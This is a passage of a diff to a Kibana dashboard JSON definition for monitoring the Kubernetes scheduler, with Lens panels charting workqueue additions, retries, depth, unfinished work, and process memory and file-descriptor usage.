"725088f8-ac91-4df6-8863-f9abe7ad40cd", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "columns": { + "725088f8-ac91-4df6-8863-f9abe7ad40cd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Depth", + "operationType": "formula", + "params": { + "formula": "differences(average(kubernetes.scheduler.workqueue.depth.count, kql='kubernetes.scheduler.workqueue.depth.count: *'))", + "isFormulaBroken": false + }, + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.depth.count: *" + }, + "isBucketed": false, + "label": "Part of Depth", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.depth.count" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Depth", + "operationType": "differences", + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "scale": "ratio" + }, + "7b8d9b03-439b-4171-8b64-91b8664b4b94": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e7259e4c-0700-48a5-aeff-993fc075bcab": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Depth", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of kubernetes.scheduler.workqueue.depth.count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.depth.count" }, - { - "id": "metrics-*", - "name": "6572ee4d-01b4-47db-8804-d8ef217e21da", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { - "columnOrder": [ - "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "4266ba8e-3786-4162-9140-15f600580db0", - "5b2495ee-2297-4e20-81d3-ac385205cb01", - "5b2495ee-2297-4e20-81d3-ac385205cb01X1", - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "columns": { - "4266ba8e-3786-4162-9140-15f600580db0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.adds.count))", - "isFormulaBroken": false - }, - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.adds.count: *" - }, - "isBucketed": false, - "label": "", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.adds.count" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "counter_rate", - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Workqueues", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6572ee4d-01b4-47db-8804-d8ef217e21da", - "key": "kubernetes.scheduler.workqueue.adds.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.adds.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01" - ], - "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "key": "kubernetes.scheduler.workqueue.depth.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.depth.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cd" + ], + "collapseFn": "", + "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", + "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "w": 24, - "x": 0, - "y": 29 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "title": "Workqueue additions increase rate", - "type": "lens", - "version": "8.6.0" + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue depth rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "w": 24, + "x": 24, + "y": 43 + }, + "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "695725fe-9d35-49c6-8289-21fbe54ff2a6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { + "columnOrder": [ + "73933c6b-b6da-45c6-a190-c501453f658f", + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" + ], + "columns": { + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "73933c6b-b6da-45c6-a190-c501453f658f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.name + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.scheduler.workqueue.unfinished.sec", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" }, - { - "id": "metrics-*", - "name": "55eaa53f-a391-4996-9721-2f7af9aa963d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77b347b2-91fa-470f-861d-ada0e175cbc4": { - "columnOrder": [ - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "34f7328b-5fef-43e7-9350-98256b031a79", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "columns": { - "34f7328b-5fef-43e7-9350-98256b031a79": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.name + 1 other", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.scheduler.workqueue.retries.count", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.retries.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.retries.count))", - "isFormulaBroken": false - }, - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.retries.count: *" - }, - "isBucketed": false, - "label": "Part of Rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.retries.count" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate", - "operationType": "counter_rate", - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "55eaa53f-a391-4996-9721-2f7af9aa963d", - "key": "kubernetes.scheduler.workqueue.retries.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.retries.count" - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + }, + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { + "dataType": "number", + "isBucketed": false, + "label": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" - ], - "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "isFormulaBroken": false + }, + "references": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.unfinished.sec: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.scheduler.workqueue.unfinished.sec)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "695725fe-9d35-49c6-8289-21fbe54ff2a6", + "key": "kubernetes.scheduler.workqueue.unfinished.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.unfinished.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", + "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "gridData": { - "h": 14, - "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "w": 24, - "x": 24, - "y": 29 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "title": "Workqueue retries increase rate", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current unfinished work" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 57 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "a0716ae8-4157-473d-8eba-8ff6625fed4b", + "w": 24, + "x": 0, + "y": 60 + }, + "panelIndex": "a0716ae8-4157-473d-8eba-8ff6625fed4b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "36494898-fe02-477e-9364-d94ea0fcb947", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "type": "column" }, - { - "id": "metrics-*", - "name": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b80230c-9cc8-444f-b092-1fbc4d764992": { - "columnOrder": [ - "e7259e4c-0700-48a5-aeff-993fc075bcab", - "7b8d9b03-439b-4171-8b64-91b8664b4b94", - "725088f8-ac91-4df6-8863-f9abe7ad40cd", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "columns": { - "725088f8-ac91-4df6-8863-f9abe7ad40cd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Depth", - "operationType": "formula", - "params": { - "formula": "differences(average(kubernetes.scheduler.workqueue.depth.count, kql='kubernetes.scheduler.workqueue.depth.count: *'))", - "isFormulaBroken": false - }, - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.depth.count: *" - }, - "isBucketed": false, - "label": "Part of Depth", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.depth.count" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Depth", - "operationType": "differences", - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "scale": "ratio" - }, - "7b8d9b03-439b-4171-8b64-91b8664b4b94": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e7259e4c-0700-48a5-aeff-993fc075bcab": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Depth", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of kubernetes.scheduler.workqueue.depth.count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.depth.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", - "key": "kubernetes.scheduler.workqueue.depth.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.depth.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cd" - ], - "collapseFn": "", - "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", - "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yLeftExtent": { - "mode": "full" + "formula": "last_value(kubernetes.scheduler.process.memory.resident.bytes, kql='kubernetes.scheduler.process.memory.resident.bytes: *')", + "isFormulaBroken": false + }, + "references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.memory.resident.bytes: *" + }, + "isBucketed": false, + "label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + }, + "formula": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "yTitle": "" + 100 + ], + "location": { + "max": 114, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "3a26dffa-0696-485d-b991-1dbc5092082e", - "w": 24, - "x": 0, - "y": 43 - }, - "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", - "title": "Workqueue depth rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Virtual memory", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "695725fe-9d35-49c6-8289-21fbe54ff2a6", - "type": "index-pattern" - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "36494898-fe02-477e-9364-d94ea0fcb947", + "key": "kubernetes.scheduler.process.fds.open.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#D6BF57", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": 